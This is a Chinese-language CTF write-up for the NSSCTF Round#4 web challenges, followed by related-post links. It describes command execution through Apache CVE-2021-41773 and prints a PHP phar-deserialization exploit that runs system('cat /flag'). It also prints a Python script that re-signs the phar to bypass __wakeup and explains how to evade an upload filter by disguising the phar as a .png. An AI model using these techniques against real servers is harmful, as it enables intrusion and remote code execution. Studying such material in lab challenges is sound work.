前言

整体Web题目不是很难，正适合我这个菜鸡打，也是我第一次在博客上发WP就好好写写，之前的比赛都没做出几道题所以没机会写，之后会更多地更新博客。

1zweb

这道题被非预期解了，查看文件可以直接文件包含读取flag

ez_rce

一打开页面只有It works!这几个大字，扫目录也没有收获。

查看apache版本，搜索有没有相关的漏洞，找到了一个目录穿越达到命令执行的漏洞。

刚好测试环境页面也是It works!，看来就是它了。

https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md

bp抓包后成功命令执行

找flag在根目录

但还需要走迷宫，一共有四层（出题人，你坏事做尽

用bp自带的板块进行爆破，获取flag

1zweb(revenge)

把flag禁了之后的第一题

可以通过查看文件查看index.php以及upload.php

// index.php
<?php
class LoveNss{public $ljt;public $dky;public $cmd;public function __construct(){$this->ljt="ljt";$this->dky="dky";phpinfo();}public function __destruct(){if($this->ljt==="Misc"&&$this->dky==="Re")eval($this->cmd);}public function __wakeup(){$this->ljt="Re";$this->dky="Misc";}
}
$file=$_POST['file'];
if(isset($_POST['file'])){if (preg_match("/flag/i", $file)) {die("nonono");}echo file_get_contents($file);
}

很明显是和反序列化相关，ile_get_contents读phar文件时能能触发返序列化漏洞，所以我们只需要创建一个phar文件就可以了。

exp

<?phpunlink('phar.phar');class LoveNss{public $ljt="Misc";public $dky="Re";public $cmd="system('cat /flag');";}$a=new LoveNss();$phar = new Phar('phar.phar');$phar->setStub('<?php __HALT_COMPILER();?>');$phar->setMetadata($a);$phar->addFromString('1.txt','dky');
?>

为了绕过__wakeup将属性数量改大

签名代码进行修复

from hashlib import sha1
f = open('./phar.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('22.phar', 'wb').write(newf) # 写入新文件

然后我们再来看upload.php

<?php
if ($_FILES["file"]["error"] > 0){echo "上传异常";
}
else{$allowedExts = array("gif", "jpeg", "jpg", "png");$temp = explode(".", $_FILES["file"]["name"]);$extension = end($temp);if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){$content=file_get_contents($_FILES["file"]["tmp_name"]);$pos = strpos($content, "__HALT_COMPILER();");if(gettype($pos)==="integer"){echo "ltj一眼就发现了phar";}else{if (file_exists("./upload/" . $_FILES["file"]["name"])){echo $_FILES["file"]["name"] . " 文件已经存在";}else{$myfile = fopen("./upload/".$_FILES["file"]["name"], "w");fwrite($myfile, $content);fclose($myfile);echo "上传成功 ./upload/".$_FILES["file"]["name"];}}}else{echo "dky不喜欢这个文件 .".$extension;}
}
?>

这里对文件后后缀进行了白名单，也对phar文件内容进行了检测，伪了绕过这两点，我们可以使用phar伪协议

php文件上传+文件包含(phar伪协议)_Spaceman-911的博客-CSDN博客_phar伪协议

将文件压缩为zip文件，并把后缀改为png文件，这样文件内容和后缀白名单检测都绕过了

成功上传

然后再用phar伪协议进行读取，解压文件并改为phar.phar,获得flag

NSSCTF Round#4 Web WP相关推荐

NSSCTF Round#8 web专项赛
文章目录 MyPage 方法一: pearcmd.php 方法二:多级连接绕过方法三: PHP Base64 Filter 宽松解析 MyDoor Upload_gogoggo ez_node My ...
Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接持续更新ing~ BuuCTF平台文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
纵横杯2020 web wp
title: 纵横杯2020 web wp date: 2020-12-26 18:19:03 tags: CTF categories: 比赛 link:https://yq1ng.github.i ...
Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
jarvis oj（web wp）
api调用这题是slim架构的xxe漏洞,看博客做题2333 https://www.leavesongs.com/PENETRATION/slim3-xxe.html simple injecti ...
ISCC2021 Web WP
目录练武 ISCC客服冲冲冲(一) 这是啥正则匹配最后的倔强. 登录 which is the true iscc ISCC客服一号冲冲冲(二) lovely ssti 擂台 tornado ea ...
[极客大挑战2021]web wp
极客大挑战2021 Welcome2021 F12,提示请使用WELCOME请求方法来请求此网页 burp抓包,修改请求方法,发现f1111aaaggg9.php 再次请求得到flag Dark To ...
bugku web wp
写在前面: 简单步骤不再复现,只是再复习一下知识点,可以挖深一点. web2 F12 计算器 F12改html $get $post ? & hackbar 矛盾很多解法 1加一个符号就行了 ...
UNCTF2020 | Web Wp
文章目录 Web 0x01:easy_ssrf 0x02:babyeval 0x03:ezphp 0x04:easy_upload 0x05:L0vephp 0x06:easyflask 0x07:e ...

NSSCTF Round#4 Web WP

前言

1zweb

ez_rce

1zweb(revenge)

NSSCTF Round#4 Web WP相关推荐

最新文章

热门文章